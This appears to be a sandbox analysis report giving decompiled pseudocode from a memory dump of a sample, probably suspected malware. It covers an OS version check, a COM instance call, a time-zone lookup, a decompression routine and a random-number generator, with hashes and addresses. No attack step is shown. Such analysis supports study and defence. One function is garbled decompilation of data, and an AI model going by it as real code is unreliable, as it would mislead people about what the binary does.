Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Desktop$CreateOpen
String ID:
API String ID: 153846745-0
Opcode ID: e4f9c36aa625183c2d28607dcb9da42cd3e5b3006782562bb7167c10d447d95c
Instruction ID: ce0c6b99146309c4e546cf30c4e9a8ae22c03d450b0668d7d4ed391ac755a26a
Opcode Fuzzy Hash: e4f9c36aa625183c2d28607dcb9da42cd3e5b3006782562bb7167c10d447d95c
Instruction Fuzzy Hash: 59E09A326002A033D332A66B6C8CE9B7E7EEBC2BE0F900439F501A2212D5644C4081B8

Uniqueness

Uniqueness Score: -1.00%

Function 00406CAF Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00406CAF() {
				void* _t23;
				void* _t27;
				void* _t29;
				void* _t31;

				_t29 = _t31 - 0x78;
				_t27 = 0;
				 *(_t29 - 0xa4) = 0x11c;
				if(GetVersionExW(_t29 - 0xa4) == 0) {
					L25:
					return _t27;
				}
				_t23 = 2;
				if( *((intOrPtr*)(_t29 - 0x94)) != _t23) {
					goto L25;
				}
				if( *((intOrPtr*)(_t29 + 0x76)) != 1) {
					if( *((intOrPtr*)(_t29 + 0x76)) == _t23 ||  *((char*)(_t29 + 0x76)) == 3) {
						if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
							if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
								goto L25;
							}
							if( *((intOrPtr*)(_t29 - 0x9c)) != _t27) {
								if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
									goto L25;
								}
								_push(7);
								L24:
								_pop(_t27);
								goto L25;
							}
							_push(5);
							goto L24;
						}
						if( *((intOrPtr*)(_t29 - 0x9c)) != _t23) {
							goto L25;
						}
						_push(3);
						goto L24;
					} else {
						goto L25;
					}
				}
				if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
					if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
						goto L25;
					}
					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
						if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
							goto L25;
						}
						_push(6);
						goto L24;
					}
					_push(4);
					goto L24;
				} else {
					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
						if( *((intOrPtr*)(_t29 - 0x9c)) == 1 ||  *((intOrPtr*)(_t29 - 0x9c)) == _t23) {
							_t27 = _t23;
						}
					} else {
						_t27 = 1;
					}
					goto L25;
				}
			}

0x00406cb0
0x00406cc2
0x00406cc4
0x00406cd6
0x00406d7d
0x00406d84
0x00406d84
0x00406cde
0x00406ce5
0x00000000
0x00000000
0x00406cf1
0x00406d40
0x00406d4f
0x00406d64
0x00000000
0x00000000
0x00406d6c
0x00406d78
0x00000000
0x00000000
0x00406d7a
0x00406d7c
0x00406d7c
0x00000000
0x00406d7c
0x00406d6e
0x00000000
0x00406d6e
0x00406d57
0x00000000
0x00000000
0x00406d59
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d40
0x00406cfa
0x00406d23
0x00000000
0x00000000
0x00406d2b
0x00406d37
0x00000000
0x00000000
0x00406d39
0x00000000
0x00406d39
0x00406d2d
0x00000000
0x00406cfc
0x00406d02
0x00406d0e
0x00406d18
0x00406d18
0x00406d04
0x00406d04
0x00406d04
0x00000000
0x00406d02

APIs

GetVersionExW.KERNEL32(?,?), ref: 00406CCE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b44ce8c28521abc37467dd6f2bed4202e1f7dd7102d1dc37e64948f6d060f5f7
Instruction ID: f6791694350b8d6bbacf439f0bcd9953f11efbf1add280b1f42550f39957f439
Opcode Fuzzy Hash: b44ce8c28521abc37467dd6f2bed4202e1f7dd7102d1dc37e64948f6d060f5f7
Instruction Fuzzy Hash: 13210430F54628DAEF308A608801FAA76729F11715F1241BBD54BB52C1E2780EE4CE6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBA9 Relevance: 1.5, APIs: 1, Instructions: 43
comCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E0040EBA9(void* __ecx) {
				void* _v8;
				char* _t8;
				void* _t19;
				void* _t22;
				intOrPtr* _t23;

				_t8 =  &_v8;
				_v8 = 0;
				__imp__CoCreateInstance(0x4015a8, 0, 0x4401, 0x401598, _t8, _t19, _t22, __ecx);
				if(_t8 != 0) {
					L2:
					_t23 = 0;
					if(0 != 0) {
						goto L3;
					}
				} else {
					_t23 = _v8;
					if(_t23 != 0) {
						L3:
						 *((intOrPtr*)( *_t23 + 0xfc))(_t23, 0);
						 *((intOrPtr*)( *_t23 + 0x120))(_t23, 0);
						 *((intOrPtr*)( *_t23 + 0x118))(_t23, 0);
						 *((intOrPtr*)( *_t23 + 0x110))(_t23, 0xffffffff);
					} else {
						goto L2;
					}
				}
				return _t23;
			}

0x0040ebaf
0x0040ebc5
0x0040ebc8
0x0040ebd0
0x0040ebd9
0x0040ebd9
0x0040ebdd
0x00000000
0x00000000
0x0040ebd2
0x0040ebd2
0x0040ebd7
0x0040ebdf
0x0040ebe3
0x0040ebed
0x0040ebf7
0x0040ec02
0x00000000
0x00000000
0x00000000
0x0040ebd7
0x0040ec0d

APIs

CoCreateInstance.OLE32(004015A8,00000000,00004401,00401598,?), ref: 0040EBC8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 9a55a64229af80b089321e17283c16c6e36b24f4862311496898d77719985a64
Instruction ID: d1b712cecba8d11fb0039cc358a4a9c7294c7ae105147e8595802094d1555bdb
Opcode Fuzzy Hash: 9a55a64229af80b089321e17283c16c6e36b24f4862311496898d77719985a64
Instruction Fuzzy Hash: 2BF08131600124BBC7219B5A8C0DDEFBBF8EFCA711B210576F856A7290D7749E018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004087B9 Relevance: 1.5, APIs: 1, Instructions: 21
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004087B9() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x004087ba
0x004087c8
0x004087d1
0x004087db
0x004087ea
0x004087dd
0x004087dd
0x00000000
0x004087dd
0x004087d3
0x004087d3
0x004087e0
0x004087e5
0x004087e5
0x004087f0

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 004087C8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 2853a7edbf82137b308b10aaeb51d9b682b8c55b11b4a9ecee4c1555807e1276
Instruction ID: c45945f17481b6921594920cb016c350960b63901c0a5d10cc8a188dabca2965
Opcode Fuzzy Hash: 2853a7edbf82137b308b10aaeb51d9b682b8c55b11b4a9ecee4c1555807e1276
Instruction Fuzzy Hash: 10E04F30644108CBDB24DAA4DF4189EB7E9A709304F30083AE581F3284EA38D9468A06

Uniqueness

Uniqueness Score: -1.00%

Function 00401DBB Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E00401DBB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x00401dbb
0x00401dbb
0x00401dbb
0x00401dbd
0x00401dbf
0x00401dc1
0x00401dc5
0x00401dc7
0x00401dc9
0x00401dcd
0x00401dd0
0x00401dd2
0x00401dd3
0x00401dd5
0x00401dda
0x00401ddb
0x00401ddd
0x00401ddd
0x00401de0
0x00401de2
0x00401de4
0x00401de4
0x00401de5
0x00401de8
0x00401dea
0x00401deb
0x00401ded
0x00401def
0x00401df1
0x00401df3
0x00401df5
0x00401df9
0x00401dff
0x00401e01
0x00401e03
0x00401e05
0x00401e07
0x00401e09
0x00401e0b
0x00401e0d
0x00401e11
0x00401e14
0x00401e15
0x00401e18
0x00401e19
0x00401e1c
0x00401e1d
0x00401e20
0x00401e21
0x00401e24
0x00401e26
0x00401e28
0x00401e31
0x00401e39
0x00401e3b
0x00401e42
0x00401e43
0x00401e4b
0x00401e59
0x00401e5f
0x00401e61
0x00401e66
0x00401e69
0x00401e6f
0x00401e71
0x00401e73
0x00401e77
0x00401e7f
0x00401e84
0x00401e8c
0x00401e8d
0x00401e8f
0x00401e97
0x00401ea2
0x00401ea3
0x00401ea9
0x00401eb3
0x00401ebb
0x00401ed4
0x00401edd
0x00401ee2
0x00401eeb
0x00401eed
0x00401ef1
0x00401ef3
0x00401efc
0x00401f00
0x00401f03
0x00401f08
0x00401f09
0x00401f0c
0x00401f11
0x00401f13
0x00401f19
0x00401f1b
0x00401f21
0x00401f23
0x00401f29
0x00401f2b
0x00401f33
0x00401f3b
0x00401f43
0x00401f4b
0x00401f53
0x00401f5b
0x00401f63
0x00401f6b
0x00401f73
0x00401f7b
0x00401f83
0x00401f8b
0x00401f91
0x00401f95
0x00401fa1
0x00401fa5
0x00401fc7
0x0040200d
0x0040200f
0x00402016
0x00402024

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 3082815f83c5bc324f6d97f0ec2138a53c581f72636d4ac4374e5c10552f4ff0
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 3581B5319893918BC795DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 0040B394 Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0040B394(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x0040b39b
0x0040b39f
0x0040b3a4
0x0040b3a6
0x0040b3a9
0x00000000
0x0040b3b0
0x0040b3b2
0x0040b3c5
0x0040b3c7
0x0040b3ca
0x0040b3cb
0x0040b3b4
0x0040b3b4
0x0040b3bb
0x0040b3bb
0x0040b3d0
0x0040b3db
0x0040b3de
0x0040b3e1
0x0040b3e2
0x0040b3e2
0x00000000
0x0040b3e2
0x0040b3e7
0x0040b3ee
0x0040b3f0
0x0040b3fe
0x0040b405
0x0040b408
0x0040b409
0x0040b3f2
0x0040b3f2
0x0040b3f9
0x0040b3f9
0x0040b412
0x0040b417
0x0040b425
0x0040b42c
0x0040b42f
0x0040b430
0x0040b419
0x0040b419
0x0040b420
0x0040b420
0x0040b433
0x0040b437
0x0040b43d
0x0040b43f
0x0040b45e
0x0040b45e
0x0040b463
0x0040b474
0x0040b479
0x0040b481
0x0040b482
0x0040b465
0x0040b465
0x0040b46f
0x0040b46f
0x0040b487
0x0040b495
0x0040b49c
0x0040b49f
0x0040b4a0
0x0040b489
0x0040b489
0x0040b490
0x0040b490
0x0040b4a6
0x0040b4a9
0x0040b4ae
0x0040b4b0
0x0040b4b7
0x0040b4b9
0x0040b4cc
0x0040b4ce
0x0040b4d1
0x0040b4d2
0x0040b4bb
0x0040b4bb
0x0040b4c2
0x0040b4c2
0x0040b4db
0x0040b4e0
0x0040b4ee
0x0040b4f5
0x0040b4f8
0x0040b4f9
0x0040b4e2
0x0040b4e2
0x0040b4e9
0x0040b4e9
0x0040b4fc
0x0040b500
0x0040b500
0x0040b50c
0x0040b510
0x0040b513
0x0040b51b
0x0040b520
0x0040b526
0x0040b529
0x0040b52a
0x0040b52d
0x0040b535
0x0040b538
0x0040b539
0x0040b53c
0x0040b53c
0x0040b53c
0x0040b541
0x00000000
0x0040b541
0x0040b44e
0x0040b450
0x0040b454
0x0040b45a
0x0040b45b
0x00000000
0x0040b45b
0x0040b549
0x0040b554
0x0040b55b
0x0040b55b

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
Instruction ID: a098a299c9dfcebba2a485ea893252dd6fff137ce653fe73c4d723c4a1857a44
Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
Instruction Fuzzy Hash: E251A132E00A259BDB14CE98C4506ADB7B1EF85324B1A41BADD56BF3C2C774AE41D7C8

Uniqueness

Uniqueness Score: -1.00%

Function 00409934 Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00409934() {
				signed int _t18;
				signed int _t38;
				signed int _t55;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x421204;
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t1 = _t55 + 0x420834; // 0x0
						_t2 = 0x420830 + _t55; // 0x0
						_t3 = 0x420830 + _t55; // 0x0
						_t6 = _t55 + 0x420e64; // 0x0
						_t60 = _t60 + 1;
						 *(0x420830 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x420000 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x420830[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x420000 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x4211ec);
					}
					_t38 =  *0x420830; // 0x0
					 *0x4211ec = ((_t38 ^  *0x4211ec) & 0x7fffffff ^  *0x4211ec) >> 0x00000001 ^  *(0x420000 + (((_t38 ^  *0x4211ec) & 0x7fffffff ^  *0x4211ec) & 0x00000001) * 4) ^  *0x420e60;
					_t18 = 0;
				}
				 *0x421204 = _t18 + 1;
				return (0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b ^ ((0x420830[_t18] ^ 0x420830[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x00409934
0x0040993e
0x00409946
0x0040994d
0x0040994f
0x00409952
0x00409958
0x00409960
0x00409974
0x0040997a
0x00409981
0x00409981
0x0040998f
0x00409991
0x00409998
0x0040999a
0x0040999a
0x004099b9
0x004099bb
0x004099bd
0x00409998
0x004099cb
0x004099ec
0x004099f1
0x004099f1
0x004099fb
0x00409a26

Memory Dump Source

